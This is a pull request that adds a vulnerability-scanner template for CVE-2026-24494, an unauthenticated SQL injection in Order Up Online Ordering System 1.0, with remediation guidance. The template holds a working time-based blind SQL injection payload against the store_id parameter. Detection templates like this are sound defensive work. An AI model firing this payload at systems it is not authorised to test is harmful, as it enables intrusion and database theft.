### PR TITLE
Add CVE-2026-24494: Order Up Online Ordering System SQL Injection

### DIFF
--- a/http/cves/2026/CVE-2026-24494.yaml
+++ b/http/cves/2026/CVE-2026-24494.yaml
@@ -1,0 +1,41 @@
+id: CVE-2026-24494
+
+info:
+  name: Order Up Online Ordering System 1.0 - SQL Injection
+  author: optimus-fulcria
+  severity: critical
+  description: |
+    SQL Injection vulnerability in the /api/integrations/getintegrations endpoint of Order Up Online Ordering System 1.0 allows an unauthenticated attacker to access sensitive backend database data via a crafted store_id parameter in a POST request.
+  impact: |
+    An unauthenticated attacker can execute arbitrary SQL queries against the backend database, potentially extracting sensitive information such as administrative credentials, customer data, and order details.
+  remediation: |
+    Use parameterized queries or prepared statements for database interactions and implement strict server-side input validation on the store_id parameter.
+  reference:
+    - https://www.spartanssec.com/post/multiple-unauthenticated-sql-injection-vulnerabilities
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-24494
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-24494
+    cwe-id: CWE-89
+  metadata:
+    verified: true
+    max-request: 1
+  tags: cve,cve2026,sqli,order-up,unauth,time-based
+
+http:
+  - raw:
+      - |
+        @timeout: 20s
+        POST /api/integrations/getintegrations HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        store_id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "duration>=6"
+          - "status_code==200"
+        condition: and


### PR DESCRIPTION
Adds detection template for CVE-2026-24494 - SQL injection in Order Up Online Ordering System.

- Unauthenticated SQL injection via store_id parameter in /api/integrations/getintegrations
- Affects Order Up Online Ordering System 1.0
- Time-based blind SQL injection detection using SLEEP(6)
- CVSS 9.8 Critical
- Reference: https://nvd.nist.gov/vuln/detail/CVE-2026-24494
- Advisory: https://www.spartanssec.com/post/multiple-unauthenticated-sql-injection-vulnerabilities